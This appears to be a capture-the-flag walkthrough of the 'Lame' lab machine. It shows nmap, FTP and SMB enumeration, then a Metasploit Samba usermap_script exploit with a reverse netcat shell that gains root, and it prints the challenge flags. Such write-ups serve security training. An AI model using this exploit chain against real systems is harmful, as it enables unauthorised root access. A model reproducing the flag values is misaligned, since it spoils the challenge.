Lame
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.3
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 01:51 EDT
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 9.79 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.3 -sV -p21,22,139,445
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 02:13 EDT
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 11.85 secondsWhen enumerating through nmap, we are able to see 3 services open → ftp, ssh and smb. We will then proceed to see what is inside of those folders.
FTP
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||14938|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||39524|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
Connecting into FTP, we note that we are able to connect as an anonymous user. However, we are unable to do any directory listing or find any helpful information.
SMB
┌──(kali㉿kali)-[~]
└─$ smbclient -N //10.10.10.3/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Sun Oct 20 01:55:13 2024
.. DR 0 Sat Oct 31 02:33:58 2020
5569.jsvc_up R 0 Sun Oct 20 01:50:13 2024
.ICE-unix DH 0 Sun Oct 20 01:49:11 2024
vmware-root DR 0 Sun Oct 20 01:49:14 2024
.X11-unix DH 0 Sun Oct 20 01:49:37 2024
.X0-lock HR 11 Sun Oct 20 01:49:37 2024
vgauthsvclog.txt.0 R 1600 Sun Oct 20 01:49:09 2024
7282168 blocks of size 1024. 5386560 blocks available
smb: \\> ls -la
NT_STATUS_NO_SUCH_FILE listing \\-la
smb: \\> get vgauthsvclog.txt.0
getting file \\vgauthsvclog.txt.0 of size 1600 as vgauthsvclog.txt.0 (2.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
smb: \\> get vmware-root
NT_STATUS_ACCESS_DENIED opening remote file \\vmware-root
smb: \\> cd vmware-root\\
smb: \\vmware-root\\> ls
NT_STATUS_ACCESS_DENIED listing \\vmware-root\\*
smb: \\vmware-root\\> cd ..
smb: \\> get 5569.jsvc_up
NT_STATUS_ACCESS_DENIED opening remote file \\5569.jsvc_up
smb: \\> get .X0-lock
getting file \\.X0-lock of size 11 as .X0-lock (0.0 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \\> exit
┌──(kali㉿kali)-[~]
└─$ rpcclient -U "" 10.10.10.3
Password for [WORKGROUP\\]:
rpcclient $> querydominfo
Domain: WORKGROUP
Server: LAME
Comment: lame server (Samba 3.0.20-Debian)
Total Users: 35
Total Groups: 0
Total Aliases: 0
Sequence No: 1729405047
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
We then navigate over and connect into our SMB service. From the initial enumeration, we are able to find a few files located inside of the folder we can access, tmp. However, the folders do not show any meaningful information for us. We also took note that the server is running on Samba 3.0.20-Debian.
┌──(kali㉿kali)-[~]
└─$ cat vgauthsvclog.txt.0
[Oct 20 01:49:09.529] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Oct 20 01:49:09.529] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Oct 20 01:49:09.529] [ message] [VGAuthService] Group 'service'
[Oct 20 01:49:09.529] [ message] [VGAuthService] samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Oct 20 01:49:09.529] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Oct 20 01:49:09.569] [ message] [VGAuthService] VGAuthService 'build-4448496' logging at level 'normal'
[Oct 20 01:49:09.569] [ message] [VGAuthService] Pref_LogAllEntries: 1 preference groups in file '/etc/vmware-tools/vgauth.conf'
[Oct 20 01:49:09.569] [ message] [VGAuthService] Group 'service'
[Oct 20 01:49:09.569] [ message] [VGAuthService] samlSchemaDir=/usr/lib/vmware-vgauth/schemas
[Oct 20 01:49:09.569] [ message] [VGAuthService] Pref_LogAllEntries: End of preferences
[Oct 20 01:49:09.569] [ message] [VGAuthService] Cannot load message catalog for domain 'VGAuthService', language 'C', catalog dir '.'.
[Oct 20 01:49:09.569] [ message] [VGAuthService] INIT SERVICE
[Oct 20 01:49:09.569] [ message] [VGAuthService] Using '/var/lib/vmware/VGAuth/aliasStore' for alias store root directory
[Oct 20 01:49:09.641] [ message] [VGAuthService] SAMLCreateAndPopulateGrammarPool: Using '/usr/lib/vmware-vgauth/schemas' for SAML schemas
[Oct 20 01:49:09.687] [ message] [VGAuthService] SAML_Init: Allowing 300 of clock skew for SAML date validation
[Oct 20 01:49:09.688] [ message] [VGAuthService] BEGIN SERVICE
┌──(kali㉿kali)-[~]
└─$ cat .X0-lock
5631
Initial Foothold
By using Metasploit, we are able to search for potential exploits for our SMB version.
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: When in a module, use back to go back to the top level
prompt
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: <https://docs.metasploit.com/>
msf6 > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
From there, we are able to identify a potential RCE exploit, which we then proceed to use.
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metas>
ploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.106.130 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:43272) at 2024-10-20 02:18:12 -0400
whoami
root
cd root
cat root.txt
2e3068557394c4b1e66c2243b0841e7a
cd ..
cd makis
ls
user.txt
cat user.txt
cdb4360bc8deac01ceffeddddda70bc1cdb4360bc8deac01ceffeddddda70bc1
2e3068557394c4b1e66c2243b0841e7a
Last updated